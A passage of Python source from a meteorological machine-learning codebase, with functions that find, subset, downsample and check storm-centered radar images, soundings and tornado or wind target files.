:param test_mode: Never mind. Just leave this alone.
:return: indices_to_keep: 1-D numpy array with indices of examples to keep.
These are all integers in [0, E - 1].
"""
num_examples = len(target_values)
if downsampling_dict is None:
return numpy.linspace(0, num_examples - 1, num=num_examples, dtype=int)
indices_to_keep = numpy.array([], dtype=int)
class_keys = list(downsampling_dict.keys())
for this_class in class_keys:
this_num_storm_objects = downsampling_dict[this_class]
these_indices = numpy.where(target_values == this_class)[0]
this_num_storm_objects = min(
[this_num_storm_objects, len(these_indices)]
)
if this_num_storm_objects == 0:
continue
if test_mode:
these_indices = these_indices[:this_num_storm_objects]
else:
these_indices = numpy.random.choice(
these_indices, size=this_num_storm_objects, replace=False)
indices_to_keep = numpy.concatenate((indices_to_keep, these_indices))
return indices_to_keep
def _file_name_to_batch_number(example_file_name):
"""Parses batch number from file.
:param example_file_name: See doc for `find_example_file`.
:return: batch_number: Integer.
:raises: ValueError: if batch number cannot be parsed from file name.
"""
pathless_file_name = os.path.split(example_file_name)[-1]
extensionless_file_name = os.path.splitext(pathless_file_name)[0]
return int(extensionless_file_name.split('input_examples_batch')[-1])
def _check_target_vars(target_names):
"""Error-checks list of target variables.
Target variables must all have the same mean lead time (average of min and
max lead times) and event type (tornado or wind).
:param target_names: 1-D list with names of target variables. Each must be
accepted by `target_val_utils.target_name_to_params`.
:return: mean_lead_time_seconds: Mean lead time (shared by all target
variables).
:return: event_type_string: Event type.
:raises: ValueError: if target variables do not all have the same mean lead
time or event type.
"""
error_checking.assert_is_string_list(target_names)
error_checking.assert_is_numpy_array(
numpy.array(target_names), num_dimensions=1
)
num_target_vars = len(target_names)
mean_lead_times = numpy.full(num_target_vars, -1, dtype=int)
event_type_strings = numpy.full(num_target_vars, '', dtype=object)
for k in range(num_target_vars):
this_param_dict = target_val_utils.target_name_to_params(
target_names[k]
)
event_type_strings[k] = this_param_dict[target_val_utils.EVENT_TYPE_KEY]
mean_lead_times[k] = int(numpy.round(
(this_param_dict[target_val_utils.MAX_LEAD_TIME_KEY] +
this_param_dict[target_val_utils.MIN_LEAD_TIME_KEY])
/ 2
))
if len(numpy.unique(mean_lead_times)) != 1:
error_string = (
'Target variables (listed below) have different mean lead times.'
'\n{0:s}'
).format(str(target_names))
raise ValueError(error_string)
if len(numpy.unique(event_type_strings)) != 1:
error_string = (
'Target variables (listed below) have different event types.\n{0:s}'
).format(str(target_names))
raise ValueError(error_string)
return mean_lead_times[0], event_type_strings[0]
def _check_layer_operation(example_dict, operation_dict):
"""Error-checks layer operation.
Such operations are used for dimensionality reduction (to convert radar data
from 3-D to 2-D).
:param example_dict: See doc for `reduce_examples_3d_to_2d`.
:param operation_dict: Dictionary with the following keys.
operation_dict["radar_field_name"]: Field to which operation will be
applied.
operation_dict["operation_name"]: Name of operation (must be in list
`VALID_LAYER_OPERATION_NAMES`).
operation_dict["min_height_m_agl"]: Minimum height of layer over which
operation will be applied.
operation_dict["max_height_m_agl"]: Max height of layer over which operation
will be applied.
:raises: ValueError: if something is wrong with the operation params.
"""
if operation_dict[RADAR_FIELD_KEY] in AZIMUTHAL_SHEAR_FIELD_NAMES:
error_string = (
'Layer operations cannot be applied to azimuthal-shear fields '
'(such as "{0:s}").'
).format(operation_dict[RADAR_FIELD_KEY])
raise ValueError(error_string)
if (operation_dict[RADAR_FIELD_KEY] == radar_utils.REFL_NAME
and REFL_IMAGE_MATRIX_KEY in example_dict):
pass
else:
if (operation_dict[RADAR_FIELD_KEY]
not in example_dict[RADAR_FIELDS_KEY]):
error_string = (
'\n{0:s}\nExamples contain only radar fields listed above, '
'which do not include "{1:s}".'
).format(
str(example_dict[RADAR_FIELDS_KEY]),
operation_dict[RADAR_FIELD_KEY]
)
raise ValueError(error_string)
if operation_dict[OPERATION_NAME_KEY] not in VALID_LAYER_OPERATION_NAMES:
error_string = (
'\n{0:s}\nValid operations (listed above) do not include '
'"{1:s}".'
).format(
str(VALID_LAYER_OPERATION_NAMES), operation_dict[OPERATION_NAME_KEY]
)
raise ValueError(error_string)
min_height_m_agl = operation_dict[MIN_HEIGHT_KEY]
max_height_m_agl = operation_dict[MAX_HEIGHT_KEY]
error_checking.assert_is_geq(
min_height_m_agl, numpy.min(example_dict[RADAR_HEIGHTS_KEY])
)
error_checking.assert_is_leq(
max_height_m_agl, numpy.max(example_dict[RADAR_HEIGHTS_KEY])
)
error_checking.assert_is_greater(max_height_m_agl, min_height_m_agl)
def _apply_layer_operation(example_dict, operation_dict):
"""Applies layer operation to radar data.
:param example_dict: See doc for `reduce_examples_3d_to_2d`.
:param operation_dict: See doc for `_check_layer_operation`.
:return: new_radar_matrix: E-by-M-by-N numpy array resulting from layer
operation.
"""
_check_layer_operation(example_dict=example_dict,
operation_dict=operation_dict)
height_diffs_metres = (
example_dict[RADAR_HEIGHTS_KEY] - operation_dict[MIN_HEIGHT_KEY]
).astype(float)
height_diffs_metres[height_diffs_metres > 0] = -numpy.inf
min_height_index = numpy.argmax(height_diffs_metres)
height_diffs_metres = (
operation_dict[MAX_HEIGHT_KEY] - example_dict[RADAR_HEIGHTS_KEY]
).astype(float)
height_diffs_metres[height_diffs_metres > 0] = -numpy.inf
max_height_index = numpy.argmax(height_diffs_metres)
operation_dict[MIN_HEIGHT_KEY] = example_dict[
RADAR_HEIGHTS_KEY][min_height_index]
operation_dict[MAX_HEIGHT_KEY] = example_dict[
RADAR_HEIGHTS_KEY][max_height_index]
operation_name = operation_dict[OPERATION_NAME_KEY]
operation_function = OPERATION_NAME_TO_FUNCTION_DICT[operation_name]
if REFL_IMAGE_MATRIX_KEY in example_dict:
orig_matrix = example_dict[REFL_IMAGE_MATRIX_KEY][
..., min_height_index:(max_height_index + 1), 0]
else:
field_index = example_dict[RADAR_FIELDS_KEY].index(
operation_dict[RADAR_FIELD_KEY])
orig_matrix = example_dict[RADAR_IMAGE_MATRIX_KEY][
..., min_height_index:(max_height_index + 1), field_index]
return operation_function(orig_matrix, axis=-1), operation_dict
def _subset_radar_data(
example_dict, netcdf_dataset_object, example_indices_to_keep,
field_names_to_keep, heights_to_keep_m_agl, num_rows_to_keep,
num_columns_to_keep):
"""Subsets radar data by field, height, and horizontal extent.
If the file contains both 2-D shear images and 3-D reflectivity images (like
MYRORSS data):
- `field_names_to_keep` will be interpreted as a list of shear fields to
keep. If None, all shear fields will be kept.
- `heights_to_keep_m_agl` will be interpreted as a list of reflectivity
heights to keep. If None, all reflectivity heights will be kept.
If the file contains only 2-D images, `field_names_to_keep` and
`heights_to_keep_m_agl` will be considered together, as a list of
field/height pairs to keep. If either argument is None, then all
field-height pairs will be kept.
If the file contains only 3-D images, `field_names_to_keep` and
`heights_to_keep_m_agl` will be considered separately:
- `field_names_to_keep` will be interpreted as a list of fields to keep. If
None, all fields will be kept.
- `heights_to_keep_m_agl` will be interpreted as a list of heights to keep.
If None, all heights will be kept.
:param example_dict: See output doc for `_read_metadata_from_example_file`.
:param netcdf_dataset_object: Same.
:param example_indices_to_keep: 1-D numpy array with indices of examples
(storm objects) to keep. These are examples in `netcdf_dataset_object`
for which radar data will be added to `example_dict`.
:param field_names_to_keep: See discussion above.
:param heights_to_keep_m_agl: See discussion above.
:param num_rows_to_keep: Number of grid rows to keep. Images will be
center-cropped (i.e., rows will be removed from the edges) to meet the
desired number of rows. If None, all rows will be kept.
:param num_columns_to_keep: Same as above but for columns.
:return: example_dict: Same as input but with the following exceptions.
[1] Keys "radar_field_names" and "radar_heights_m_agl" may have different
values.
[2] If file contains both 2-D and 3-D images, dictionary now contains keys
"reflectivity_image_matrix_dbz" and "az_shear_image_matrix_s01".
[3] If file contains only 2-D or only 3-D images, dictionary now contains
key "radar_image_matrix".
"""
if field_names_to_keep is None:
field_names_to_keep = copy.deepcopy(example_dict[RADAR_FIELDS_KEY])
if heights_to_keep_m_agl is None:
heights_to_keep_m_agl = example_dict[RADAR_HEIGHTS_KEY] + 0
error_checking.assert_is_numpy_array(
numpy.array(field_names_to_keep), num_dimensions=1
)
heights_to_keep_m_agl = numpy.round(heights_to_keep_m_agl).astype(int)
error_checking.assert_is_numpy_array(
heights_to_keep_m_agl, num_dimensions=1)
if RADAR_IMAGE_MATRIX_KEY in netcdf_dataset_object.variables:
radar_matrix = numpy.array(
netcdf_dataset_object.variables[RADAR_IMAGE_MATRIX_KEY][
example_indices_to_keep, ...
],
dtype=float
)
num_radar_dimensions = len(radar_matrix.shape) - 2
if num_radar_dimensions == 2:
these_indices = [
numpy.where(numpy.logical_and(
example_dict[RADAR_FIELDS_KEY] == f,
example_dict[RADAR_HEIGHTS_KEY] == h
))[0][0]
for f, h in zip(field_names_to_keep, heights_to_keep_m_agl)
]
these_indices = numpy.array(these_indices, dtype=int)
radar_matrix = radar_matrix[..., these_indices]
else:
these_field_indices = numpy.array([
example_dict[RADAR_FIELDS_KEY].index(f)
for f in field_names_to_keep
], dtype=int)
radar_matrix = radar_matrix[..., these_field_indices]
these_height_indices = numpy.array([
numpy.where(example_dict[RADAR_HEIGHTS_KEY] == h)[0][0]
for h in heights_to_keep_m_agl
], dtype=int)
radar_matrix = radar_matrix[..., these_height_indices, :]
radar_matrix = storm_images.downsize_storm_images(
storm_image_matrix=radar_matrix,
radar_field_name=field_names_to_keep[0],
num_rows_to_keep=num_rows_to_keep,
num_columns_to_keep=num_columns_to_keep)
example_dict[RADAR_IMAGE_MATRIX_KEY] = radar_matrix
else:
reflectivity_matrix_dbz = numpy.array(
netcdf_dataset_object.variables[REFL_IMAGE_MATRIX_KEY][
example_indices_to_keep, ...
],
dtype=float
)
reflectivity_matrix_dbz = numpy.expand_dims(
reflectivity_matrix_dbz, axis=-1
)
azimuthal_shear_matrix_s01 = numpy.array(
netcdf_dataset_object.variables[AZ_SHEAR_IMAGE_MATRIX_KEY][
example_indices_to_keep, ...
],
dtype=float
)
these_height_indices = numpy.array([
numpy.where(example_dict[RADAR_HEIGHTS_KEY] == h)[0][0]
for h in heights_to_keep_m_agl
], dtype=int)
reflectivity_matrix_dbz = reflectivity_matrix_dbz[
..., these_height_indices, :]
these_field_indices = numpy.array([
example_dict[RADAR_FIELDS_KEY].index(f)
for f in field_names_to_keep
], dtype=int)
azimuthal_shear_matrix_s01 = azimuthal_shear_matrix_s01[
..., these_field_indices]
reflectivity_matrix_dbz = storm_images.downsize_storm_images(
storm_image_matrix=reflectivity_matrix_dbz,
radar_field_name=radar_utils.REFL_NAME,
num_rows_to_keep=num_rows_to_keep,
num_columns_to_keep=num_columns_to_keep)
azimuthal_shear_matrix_s01 = storm_images.downsize_storm_images(
storm_image_matrix=azimuthal_shear_matrix_s01,
radar_field_name=field_names_to_keep[0],
num_rows_to_keep=num_rows_to_keep,
num_columns_to_keep=num_columns_to_keep)
example_dict[REFL_IMAGE_MATRIX_KEY] = reflectivity_matrix_dbz
example_dict[AZ_SHEAR_IMAGE_MATRIX_KEY] = azimuthal_shear_matrix_s01
example_dict[RADAR_FIELDS_KEY] = field_names_to_keep
example_dict[RADAR_HEIGHTS_KEY] = heights_to_keep_m_agl
return example_dict
def _subset_sounding_data(
example_dict, netcdf_dataset_object, example_indices_to_keep,
field_names_to_keep, heights_to_keep_m_agl):
"""Subsets sounding data by field and height.
:param example_dict: See doc for `_subset_radar_data`.
:param netcdf_dataset_object: Same.
:param example_indices_to_keep: Same.
:param field_names_to_keep: 1-D list of field names to keep. If None, will
keep all fields.
:param heights_to_keep_m_agl: 1-D numpy array of heights to keep. If None,
will keep all heights.
:return: example_dict: Same as input but with the following exceptions.
[1] Keys "sounding_field_names" and "sounding_heights_m_agl" may have
different values.
[2] Key "sounding_matrix" has been added.
"""
if field_names_to_keep is None:
field_names_to_keep = copy.deepcopy(example_dict[SOUNDING_FIELDS_KEY])
if heights_to_keep_m_agl is None:
heights_to_keep_m_agl = example_dict[SOUNDING_HEIGHTS_KEY] + 0
error_checking.assert_is_numpy_array(
numpy.array(field_names_to_keep), num_dimensions=1
)
heights_to_keep_m_agl = numpy.round(heights_to_keep_m_agl).astype(int)
error_checking.assert_is_numpy_array(
heights_to_keep_m_agl, num_dimensions=1)
sounding_matrix = numpy.array(
netcdf_dataset_object.variables[SOUNDING_MATRIX_KEY][
example_indices_to_keep, ...
],
dtype=float
)
# TODO(thunderhoser): This is a HACK.
spfh_index = example_dict[SOUNDING_FIELDS_KEY].index(
soundings.SPECIFIC_HUMIDITY_NAME)
temp_index = example_dict[SOUNDING_FIELDS_KEY].index(
soundings.TEMPERATURE_NAME)
pressure_index = example_dict[SOUNDING_FIELDS_KEY].index(
soundings.PRESSURE_NAME)
theta_v_index = example_dict[SOUNDING_FIELDS_KEY].index(
soundings.VIRTUAL_POTENTIAL_TEMPERATURE_NAME)
sounding_matrix[..., spfh_index][
numpy.isnan(sounding_matrix[..., spfh_index])
] = 0.
nan_example_indices, nan_height_indices = numpy.where(numpy.isnan(
sounding_matrix[..., theta_v_index]
))
if len(nan_example_indices) > 0:
this_temp_matrix_kelvins = sounding_matrix[..., temp_index][
nan_example_indices, nan_height_indices]
this_pressure_matrix_pa = sounding_matrix[..., pressure_index][
nan_example_indices, nan_height_indices]
this_thetav_matrix_kelvins = (
temp_conversion.temperatures_to_potential_temperatures(
temperatures_kelvins=this_temp_matrix_kelvins,
total_pressures_pascals=this_pressure_matrix_pa)
)
sounding_matrix[..., theta_v_index][
nan_example_indices, nan_height_indices
] = this_thetav_matrix_kelvins
these_indices = numpy.array([
example_dict[SOUNDING_FIELDS_KEY].index(f)
for f in field_names_to_keep
], dtype=int)
sounding_matrix = sounding_matrix[..., these_indices]
these_indices = numpy.array([
numpy.where(example_dict[SOUNDING_HEIGHTS_KEY] == h)[0][0]
for h in heights_to_keep_m_agl
], dtype=int)
sounding_matrix = sounding_matrix[..., these_indices, :]
example_dict[SOUNDING_FIELDS_KEY] = field_names_to_keep
example_dict[SOUNDING_HEIGHTS_KEY] = heights_to_keep_m_agl
example_dict[SOUNDING_MATRIX_KEY] = sounding_matrix
return example_dict
def find_storm_images_2d(
top_directory_name, radar_source, radar_field_names,
first_spc_date_string, last_spc_date_string, radar_heights_m_agl=None,
reflectivity_heights_m_agl=None):
"""Locates files with 2-D storm-centered radar images.
D = number of SPC dates in time period (`first_spc_date_string`...
`last_spc_date_string`)
:param top_directory_name: Name of top-level directory. Files therein will
be found by `storm_images.find_storm_image_file`.
:param radar_source: Data source (must be accepted by
`radar_utils.check_data_source`).
:param radar_field_names: 1-D list of radar fields. Each item must be
accepted by `radar_utils.check_field_name`.
:param first_spc_date_string: First SPC date (format "yyyymmdd"). This
method will locate files from `first_spc_date_string`...
`last_spc_date_string`.
:param last_spc_date_string: Same.
:param radar_heights_m_agl: [used only if radar_source = "gridrad"]
1-D numpy array of radar heights (metres above ground level). These
heights apply to all radar fields.
:param reflectivity_heights_m_agl: [used only if radar_source != "gridrad"]
1-D numpy array of reflectivity heights (metres above ground level).
These heights do not apply to other radar fields.
:return: radar_file_name_matrix: D-by-C numpy array of file paths.
"""
radar_utils.check_data_source(radar_source)
first_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec(
first_spc_date_string)
last_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec(
last_spc_date_string)
if radar_source == radar_utils.GRIDRAD_SOURCE_ID:
storm_image_file_dict = storm_images.find_many_files_gridrad(
top_directory_name=top_directory_name,
radar_field_names=radar_field_names,
radar_heights_m_agl=radar_heights_m_agl,
start_time_unix_sec=first_spc_date_unix_sec,
end_time_unix_sec=last_spc_date_unix_sec,
one_file_per_time_step=False, raise_error_if_all_missing=True)
else:
storm_image_file_dict = storm_images.find_many_files_myrorss_or_mrms(
top_directory_name=top_directory_name, radar_source=radar_source,
radar_field_names=radar_field_names,
reflectivity_heights_m_agl=reflectivity_heights_m_agl,
start_time_unix_sec=first_spc_date_unix_sec,
end_time_unix_sec=last_spc_date_unix_sec,
one_file_per_time_step=False,
raise_error_if_all_missing=True, raise_error_if_any_missing=False)
radar_file_name_matrix = storm_image_file_dict[
storm_images.IMAGE_FILE_NAMES_KEY]
num_file_times = radar_file_name_matrix.shape[0]
if radar_source == radar_utils.GRIDRAD_SOURCE_ID:
num_field_height_pairs = (
radar_file_name_matrix.shape[1] * radar_file_name_matrix.shape[2]
)
radar_file_name_matrix = numpy.reshape(
radar_file_name_matrix, (num_file_times, num_field_height_pairs)
)
time_missing_indices = numpy.unique(
numpy.where(radar_file_name_matrix == '')[0]
)
return numpy.delete(
radar_file_name_matrix, time_missing_indices, axis=0)
def find_storm_images_3d(
top_directory_name, radar_source, radar_field_names,
radar_heights_m_agl, first_spc_date_string, last_spc_date_string):
"""Locates files with 3-D storm-centered radar images.
D = number of SPC dates in time period (`first_spc_date_string`...
`last_spc_date_string`)
:param top_directory_name: See doc for `find_storm_images_2d`.
:param radar_source: Same.
:param radar_field_names: List (length F_r) of radar fields. Each item must
be accepted by `radar_utils.check_field_name`.
:param radar_heights_m_agl: numpy array (length H_r) of radar heights
(metres above ground level).
:param first_spc_date_string: First SPC date (format "yyyymmdd"). This
method will locate files from `first_spc_date_string`...
`last_spc_date_string`.
:param last_spc_date_string: Same.
:return: radar_file_name_matrix: numpy array (D x F_r x H_r) of file paths.
"""
radar_utils.check_data_source(radar_source)
first_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec(
first_spc_date_string)
last_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec(
last_spc_date_string)
if radar_source == radar_utils.GRIDRAD_SOURCE_ID:
file_dict = storm_images.find_many_files_gridrad(
top_directory_name=top_directory_name,
radar_field_names=radar_field_names,
radar_heights_m_agl=radar_heights_m_agl,
start_time_unix_sec=first_spc_date_unix_sec,
end_time_unix_sec=last_spc_date_unix_sec,
one_file_per_time_step=False, raise_error_if_all_missing=True)
else:
file_dict = storm_images.find_many_files_myrorss_or_mrms(
top_directory_name=top_directory_name, radar_source=radar_source,
radar_field_names=[radar_utils.REFL_NAME],
reflectivity_heights_m_agl=radar_heights_m_agl,
start_time_unix_sec=first_spc_date_unix_sec,
end_time_unix_sec=last_spc_date_unix_sec,
one_file_per_time_step=False,
raise_error_if_all_missing=True, raise_error_if_any_missing=False)
radar_file_name_matrix = file_dict[storm_images.IMAGE_FILE_NAMES_KEY]
num_file_times = radar_file_name_matrix.shape[0]
if radar_source != radar_utils.GRIDRAD_SOURCE_ID:
radar_file_name_matrix = numpy.reshape(
radar_file_name_matrix,
(num_file_times, 1, len(radar_heights_m_agl))
)
time_missing_indices = numpy.unique(
numpy.where(radar_file_name_matrix == '')[0]
)
return numpy.delete(
radar_file_name_matrix, time_missing_indices, axis=0)
def find_storm_images_2d3d_myrorss(
top_directory_name, first_spc_date_string, last_spc_date_string,
reflectivity_heights_m_agl):
"""Locates files with 2-D and 3-D storm-centered radar images.
Fields in 2-D images: low-level and mid-level azimuthal shear
Field in 3-D images: reflectivity
D = number of SPC dates in time period (`first_spc_date_string`...
`last_spc_date_string`)
:param top_directory_name: See doc for `find_storm_images_2d`.
:param first_spc_date_string: Same.
:param last_spc_date_string: Same.
:param reflectivity_heights_m_agl: Same.
:return: az_shear_file_name_matrix: D-by-2 numpy array of file paths. Files
in column 0 are low-level az shear; files in column 1 are mid-level az
shear.
:return: reflectivity_file_name_matrix: D-by-H numpy array of file paths,
where H = number of reflectivity heights.
"""
first_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec(
first_spc_date_string)
last_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec(
last_spc_date_string)
field_names = AZIMUTHAL_SHEAR_FIELD_NAMES + [radar_utils.REFL_NAME]
storm_image_file_dict = storm_images.find_many_files_myrorss_or_mrms(
top_directory_name=top_directory_name,
radar_source=radar_utils.MYRORSS_SOURCE_ID,
radar_field_names=field_names,
reflectivity_heights_m_agl=reflectivity_heights_m_agl,
start_time_unix_sec=first_spc_date_unix_sec,
end_time_unix_sec=last_spc_date_unix_sec,
one_file_per_time_step=False,
raise_error_if_all_missing=True, raise_error_if_any_missing=False)
radar_file_name_matrix = storm_image_file_dict[
storm_images.IMAGE_FILE_NAMES_KEY]
time_missing_indices = numpy.unique(
numpy.where(radar_file_name_matrix == '')[0]
)
radar_file_name_matrix = numpy.delete(
radar_file_name_matrix, time_missing_indices, axis=0)
return radar_file_name_matrix[:, :2], radar_file_name_matrix[:, 2:]
def find_sounding_files(
top_sounding_dir_name, radar_file_name_matrix, target_names,
lag_time_for_convective_contamination_sec):
"""Locates files with storm-centered soundings.
D = number of SPC dates in time period
:param top_sounding_dir_name: Name of top-level directory. Files therein
will be found by `soundings.find_sounding_file`.
:param radar_file_name_matrix: numpy array created by either
`find_storm_images_2d` or `find_storm_images_3d`. Length of the first
axis is D.
:param target_names: See doc for `_check_target_vars`.
:param lag_time_for_convective_contamination_sec: See doc for
`soundings.read_soundings`.
:return: sounding_file_names: length-D list of file paths.
"""
error_checking.assert_is_numpy_array(radar_file_name_matrix)
num_file_dimensions = len(radar_file_name_matrix.shape)
error_checking.assert_is_geq(num_file_dimensions, 2)
error_checking.assert_is_leq(num_file_dimensions, 3)
mean_lead_time_seconds = _check_target_vars(target_names)[0]
num_file_times = radar_file_name_matrix.shape[0]
sounding_file_names = [''] * num_file_times
for i in range(num_file_times):
if num_file_dimensions == 2:
this_file_name = radar_file_name_matrix[i, 0]
else:
this_file_name = radar_file_name_matrix[i, 0, 0]
this_time_unix_sec, this_spc_date_string = (
storm_images.image_file_name_to_time(this_file_name)
)
sounding_file_names[i] = soundings.find_sounding_file(
top_directory_name=top_sounding_dir_name,
spc_date_string=this_spc_date_string,
lead_time_seconds=mean_lead_time_seconds,
lag_time_for_convective_contamination_sec=
lag_time_for_convective_contamination_sec,
init_time_unix_sec=this_time_unix_sec, raise_error_if_missing=True)
return sounding_file_names
def find_target_files(top_target_dir_name, radar_file_name_matrix,
target_names):
"""Locates files with target values (storm-hazard indicators).
D = number of SPC dates in time period
:param top_target_dir_name: Name of top-level directory. Files therein
will be found by `target_val_utils.find_target_file`.
:param radar_file_name_matrix: numpy array created by either
`find_storm_images_2d` or `find_storm_images_3d`. Length of the first
axis is D.
:param target_names: See doc for `_check_target_vars`.
:return: target_file_names: length-D list of file paths.
"""
error_checking.assert_is_numpy_array(radar_file_name_matrix)
num_file_dimensions = len(radar_file_name_matrix.shape)
error_checking.assert_is_geq(num_file_dimensions, 2)
error_checking.assert_is_leq(num_file_dimensions, 3)
event_type_string = _check_target_vars(target_names)[-1]
num_file_times = radar_file_name_matrix.shape[0]
target_file_names = [''] * num_file_times
for i in range(num_file_times):
if num_file_dimensions == 2:
this_file_name = radar_file_name_matrix[i, 0]
else:
this_file_name = radar_file_name_matrix[i, 0, 0]
_, this_spc_date_string = storm_images.image_file_name_to_time(
this_file_name)
target_file_names[i] = target_val_utils.find_target_file(
top_directory_name=top_target_dir_name,
event_type_string=event_type_string,
spc_date_string=this_spc_date_string, raise_error_if_missing=False)
if os.path.isfile(target_file_names[i]):
continue
target_file_names[i] = None
return target_file_names
def subset_examples(example_dict, indices_to_keep, create_new_dict=False):
"""Subsets examples in dictionary.
:param example_dict: See doc for `write_example_file`.
:param indices_to_keep: 1-D numpy array with indices of examples to keep.
:param create_new_dict: Boolean flag. If True, this method will create a
new dictionary, leaving the input dictionary untouched.
:return: example_dict: Same as input, but possibly with fewer examples.
"""
error_checking.assert_is_integer_numpy_array(indices_to_keep)
error_checking.assert_is_numpy_array(indices_to_keep, num_dimensions=1)
error_checking.assert_is_boolean(create_new_dict)
if not create_new_dict:
for this_key in MAIN_KEYS:
optional_key_missing = (
this_key not in REQUIRED_MAIN_KEYS
and this_key not in example_dict
)
if optional_key_missing:
continue
if this_key == TARGET_MATRIX_KEY:
if this_key in example_dict:
example_dict[this_key] = (
example_dict[this_key][indices_to_keep, ...]
)
else:
example_dict[TARGET_VALUES_KEY] = (
example_dict[TARGET_VALUES_KEY][indices_to_keep]
)
continue
if this_key == FULL_IDS_KEY:
example_dict[this_key] = [
example_dict[this_key][k] for k in indices_to_keep
]
else:
example_dict[this_key] = example_dict[this_key][
indices_to_keep, ...]
return example_dict
new_example_dict = {}
for this_key in METADATA_KEYS:
sounding_key_missing = (
this_key in [SOUNDING_FIELDS_KEY, SOUNDING_HEIGHTS_KEY]
and this_key not in example_dict
)
if sounding_key_missing:
continue
if this_key == TARGET_NAMES_KEY:
if this_key in example_dict:
new_example_dict[this_key] = example_dict[this_key]
else:
new_example_dict[TARGET_NAME_KEY] = example_dict[
TARGET_NAME_KEY]
continue
new_example_dict[this_key] = example_dict[this_key]
for this_key in MAIN_KEYS:
optional_key_missing = (
this_key not in REQUIRED_MAIN_KEYS
and this_key not in example_dict
)
if optional_key_missing:
continue
if this_key == TARGET_MATRIX_KEY:
if this_key in example_dict:
new_example_dict[this_key] = (
example_dict[this_key][indices_to_keep, ...]
)
else:
new_example_dict[TARGET_VALUES_KEY] = (
example_dict[TARGET_VALUES_KEY][indices_to_keep]
)
continue
if this_key == FULL_IDS_KEY:
new_example_dict[this_key] = [
example_dict[this_key][k] for k in indices_to_keep
]
else:
new_example_dict[this_key] = example_dict[this_key][
indices_to_keep, ...]
return new_example_dict
def find_example_file(
top_directory_name, shuffled=True, spc_date_string=None,
batch_number=None, raise_error_if_missing=True):
"""Looks for file with input examples.
If `shuffled = True`, this method looks for a file with shuffled examples
(from many different times). If `shuffled = False`, this method looks for a
file with examples from one SPC date.
:param top_directory_name: Name of top-level directory with input examples.
:param shuffled: Boolean flag. The role of this flag is explained in the
general discussion above.
:param spc_date_string: [used only if `shuffled = False`]
SPC date (format "yyyymmdd").
:param batch_number: [used only if `shuffled = True`]
Batch number (integer).
:param raise_error_if_missing: Boolean flag. If file is missing and
`raise_error_if_missing = True`, this method will error out.
:return: example_file_name: Path to file with input examples. If file is
missing and `raise_error_if_missing = False`, this is the *expected*
path.
:raises: ValueError: if file is missing and `raise_error_if_missing = True`.
"""
error_checking.assert_is_string(top_directory_name)
error_checking.assert_is_boolean(shuffled)
error_checking.assert_is_boolean(raise_error_if_missing)
if shuffled:
error_checking.assert_is_integer(batch_number)
error_checking.assert_is_geq(batch_number, 0)
first_batch_number = int(number_rounding.floor_to_nearest(
batch_number, NUM_BATCHES_PER_DIRECTORY))
last_batch_number = first_batch_number + NUM_BATCHES_PER_DIRECTORY - 1
example_file_name = (
'{0:s}/batches{1:07d}-{2:07d}/input_examples_batch{3:07d}.nc'
).format(top_directory_name, first_batch_number, last_batch_number,
batch_number)
else:
time_conversion.spc_date_string_to_unix_sec(spc_date_string)
example_file_name = (
'{0:s}/{1:s}/input_examples_{2:s}.nc'
).format(top_directory_name, spc_date_string[:4], spc_date_string)
if raise_error_if_missing and not os.path.isfile(example_file_name):
error_string = 'Cannot find file. Expected at: "{0:s}"'.format(
example_file_name)
raise ValueError(error_string)
return example_file_name
def find_many_example_files(
top_directory_name, shuffled=True, first_spc_date_string=None,
last_spc_date_string=None, first_batch_number=None,
last_batch_number=None, raise_error_if_any_missing=True):
"""Looks for many files with input examples.
:param top_directory_name: See doc for `find_example_file`.
:param shuffled: Same.
:param first_spc_date_string: [used only if `shuffled = False`]
First SPC date (format "yyyymmdd"). This method will look for all SPC
dates from `first_spc_date_string`...`last_spc_date_string`.
:param last_spc_date_string: See above.
:param first_batch_number: [used only if `shuffled = True`]
First batch number (integer). This method will look for all batches
from `first_batch_number`...`last_batch_number`.
:param last_batch_number: See above.
:param raise_error_if_any_missing: Boolean flag. If *any* desired file is
not found and `raise_error_if_any_missing = True`, this method will
error out.
:return: example_file_names: 1-D list of paths to example files.
:raises: ValueError: if no files are found.
"""
error_checking.assert_is_boolean(shuffled)
if shuffled:
error_checking.assert_is_integer(first_batch_number)
error_checking.assert_is_integer(last_batch_number)
error_checking.assert_is_geq(first_batch_number, 0)
error_checking.assert_is_geq(last_batch_number, first_batch_number)
example_file_pattern = (
'{0:s}/batches{1:s}-{1:s}/input_examples_batch{1:s}.nc'
).format(top_directory_name, BATCH_NUMBER_REGEX)
example_file_names = glob.glob(example_file_pattern)
if len(example_file_names) > 0:
batch_numbers = numpy.array(
[_file_name_to_batch_number(f) for f in example_file_names],
dtype=int)
good_indices = numpy.where(numpy.logical_and(
batch_numbers >= first_batch_number,
batch_numbers <= last_batch_number
))[0]
example_file_names = [example_file_names[k] for k in good_indices]
if len(example_file_names) == 0:
error_string = (
'Cannot find any files with batch number from {0:d}...{1:d}.'
).format(first_batch_number, last_batch_number)
raise ValueError(error_string)
return example_file_names
spc_date_strings = time_conversion.get_spc_dates_in_range(
first_spc_date_string=first_spc_date_string,
last_spc_date_string=last_spc_date_string)
example_file_names = []
for this_spc_date_string in spc_date_strings:
this_file_name = find_example_file(
top_directory_name=top_directory_name, shuffled=False,
spc_date_string=this_spc_date_string,
raise_error_if_missing=raise_error_if_any_missing)
if not os.path.isfile(this_file_name):
continue
example_file_names.append(this_file_name)
if len(example_file_names) == 0:
error_string = (
'Cannot find any file with SPC date from {0:s} to {1:s}.'
).format(first_spc_date_string, last_spc_date_string)
raise ValueError(error_string)
return example_file_names
def write_example_file(netcdf_file_name, example_dict, append_to_file=False):
"""Writes input examples to NetCDF file.
The following keys are required in `example_dict` only if the examples
include soundings:
- "sounding_field_names"
- "sounding_heights_m_agl"
- "sounding_matrix"
If the examples contain both 2-D azimuthal-shear images and 3-D
reflectivity images:
- Keys "reflectivity_image_matrix_dbz" and "az_shear_image_matrix_s01" are
required.
- "radar_heights_m_agl" should contain only reflectivity heights.
- "radar_field_names" should contain only the names of azimuthal-shear
fields.
If the examples contain 2-D radar images and no 3-D images:
- Key "radar_image_matrix" is required.
- The [j]th element of "radar_field_names" should be the name of the [j]th
radar field.
- The [j]th element of "radar_heights_m_agl" should be the corresponding
height.
- Thus, there are C elements in "radar_field_names", C elements in
